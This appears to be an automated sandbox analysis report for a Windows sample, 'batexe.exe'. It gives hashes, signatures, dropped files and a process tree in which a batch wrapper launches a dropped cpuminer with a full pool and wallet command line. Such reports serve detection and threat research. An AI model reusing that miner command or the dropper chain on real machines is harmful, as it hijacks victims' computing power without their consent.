73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24/02/2024, 13:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1396	b2e.exe
4004	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe
4004	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/320-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 320 wrote to memory of 1396	320	batexe.exe	75
PID 320 wrote to memory of 1396	320	batexe.exe	75
PID 320 wrote to memory of 1396	320	batexe.exe	75
PID 1396 wrote to memory of 4060	1396	b2e.exe	76
PID 1396 wrote to memory of 4060	1396	b2e.exe	76
PID 1396 wrote to memory of 4060	1396	b2e.exe	76
PID 4060 wrote to memory of 4004	4060	cmd.exe	79
PID 4060 wrote to memory of 4004	4060	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:320
- C:\Users\Admin\AppData\Local\Temp\1B72.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\1B72.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\1B72.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\219C.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1B72.tmp\b2e.exe

Filesize
1.1MB

MD5
c8ddb9a1b99b955d28ce987616dc783a

SHA1
6a50a41aac042de84cbe5fe9cfa8ef171c1a15ba

SHA256
d42d045c7eaec84a0576fa2d1e67566cd65686605e6f66217c2da6ec9faa060a

SHA512
8804aa717bb5d9a88543175afd4ed3363ae6d1ff9846379f9bbfb7ff1b49cf0031fd6b1cbb0b1491a94d1158663021c8bf56c47050f3192b62a0c5bb5499d397

Download Submit
C:\Users\Admin\AppData\Local\Temp\1B72.tmp\b2e.exe

Filesize
371KB

MD5
732e5052669f4970886a25916831473b

SHA1
d9a27bf4a4a63766481259c6f21dff04d9e7e800

SHA256
df90e32a79d8940bb69bb734f4d5a355c78add1c62266e0099a643d47f400304

SHA512
00a6d7ce257372a17c0692be7646c91395ce968a696f1f6208957d9b10c84e9934d487be9b5301269386ba380253232607a35182f724a4b37f5f46aa5bcda862

Download Submit
C:\Users\Admin\AppData\Local\Temp\219C.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
243KB

MD5
65e999850429137cc6c20136a07bc16b

SHA1
d3ebe98b57a7d18f44ac05c094210657b10cadd9

SHA256
febc14ef44656a8c79bb960e9d871c435ebe0a5e795d50d1364ead7cefe16e0b

SHA512
f2ec8238f0544efc50d711c4f0d8716acef1cfd9487370b5654bbd27a9d1d39f70d39843b20a641b4997fd692c8baf3178ab71ace1ceb857b2678fdb1735f30f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
286KB

MD5
5ae24d45e1410a88e25ec23d9c810a08

SHA1
d8f8d9b4a8cd9370e55c5206eace8db7309b0738

SHA256
c12b289c91453952f57285f3280c914102edcc7430713aadeee49e2b9c888d6f

SHA512
114141559671b5f290bc252f8a0b722dead6f1c846fd5d458ce75b893013b6cffed18d72f5b6944d421d760ce407f4df4e375a6a552fe0283a25f081042c4ae6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
171KB

MD5
a0efde88076f0698e567708e917755dc

SHA1
f89e2fda164ea81a9a2b229c524f4bcda98e488b

SHA256
b2f74b66cad562769409646ff64afcea85ddc3271c7c10d4b492d1e02b4ed311

SHA512
379cac12824171b2b26ec4872d8575ee592c0e0e87dbcd161535d48eba5218409ea95a4291facdfcaec6eda2959550d07a2865cc6377d26b8bd9288430932a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
349KB

MD5
0db9870ca08aa04d43748a41b9a2b7c6

SHA1
f8bc79c6a38929d92e6d5f3ecda8e78fce7bd32f

SHA256
ca01a9b9968f187cfb529dba2e78462cae6ded7440cd7ddf51b4574bc962aaff

SHA512
0b98d4a022d67a3bfe410f64179aa4ccc2ec679cf7ff49ed997a02ce7c663c9d5ce2d12b2f1e049cdc3fc9fac1bec3376aad2cf15a5c2090ff28d6ad7fd5f5bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
222KB

MD5
75eb3e29369c1ab7740e209b03e0616c

SHA1
b573e274ffcf5103a94d3723c75fe279fa8c1526

SHA256
fbc0193dfa450349e371993771e69fca3d6fdb0873684da655a94f3948c2932c

SHA512
1ba81f6aee35b78c7f5a42375c4a912f9553d4ecb98320cf75ed804e265721853f173cb6d6b1b840b05940d2e380c468cf637c626b49fe4d0ae03fa88b228d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
174KB

MD5
5dfacf0014196c93102438bc28964dbc

SHA1
03974ec84d00ea568a33898f08e78d97af2892bc

SHA256
854a2bb130afd91493de2775f2cc372a2ce10b27435a5a4c4d4b52d95e840540

SHA512
6026f585b80942a3b2f9c80853061b49b86ae0e75917e964ff5d26aa0678e6cbee1192405ac0c4e933ddcd418ab01c18edc08e78bb56744b8b189b21799618ce

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
333KB

MD5
1c8942ea4c1beaa7b7d59c4beb31ea5d

SHA1
d184fa2830636b51294c51a789f9a27802fe79f8

SHA256
5fad0281131af1474ecd0fb4632d0a105956e6ca12c0122de7e9dd93601aa51d

SHA512
15a52037b97a7c32de96c4a79df3726ad0af4f6e20a6a3bbb08b9657beb057b5d7c007636b898972d1bd8071080eef112d370a6aa120fbb21bc626336e22f873

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
415KB

MD5
8dde3f1deda58f0889904a637268d156

SHA1
309a6ae666605d7988419a61782c8a1ef5980230

SHA256
c481d0461e2e2b3d5202d5b957de15b091c955a5c74f63514d1b99f867bf9e07

SHA512
fe4f6f19697e4b9affe538ef1a2a713d6c2d8322aaac23dafcd1662c68490ef875a1536c6b3fd06a5c6682281b5415f0ca1aa3a23a71ce5b3d6f27ab3d699411

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
196KB

MD5
78061a81b865369e65ed66a9a8484311

SHA1
4d2ed0600791813c33bba30e572a52b8767b8bec

SHA256
494d001d1fdf0f10da228bded371e8178750243525c8a594fc01619ad65486f0

SHA512
c8ff848933f4e3723847c87c89c721806189041c74a93c4e160af952eaca9ccc098b8156788a0b29b60be1c7218d88b803b66a3b7de1c1cfc2b861ee16ee1e06

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
147KB

MD5
d9e5447a432b3ef127c4a313713b512b

SHA1
8ccd2477c1d62bbf43440a377218ada19058d516

SHA256
a81c5169d28cca0b36e5259233f2816dc26a676aff454877b1544f16af092f77

SHA512
f5ff793b7ffe56926b86299c9aab3e0ef30903f04704a0ccfe5c500cde49639ece7ecc4ed9c05bfaa38b626d576bba60d86b11a0e2901351a8a7ae6c9993f6b0

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/320-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1396-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1396-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4004-44-0x0000000001130000-0x00000000029E5000-memory.dmp

Filesize
24.7MB

Download
memory/4004-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4004-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-43-0x0000000061DB0000-0x0000000061E48000-memory.dmp

Filesize
608KB

Download
memory/4004-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4004-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4004-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download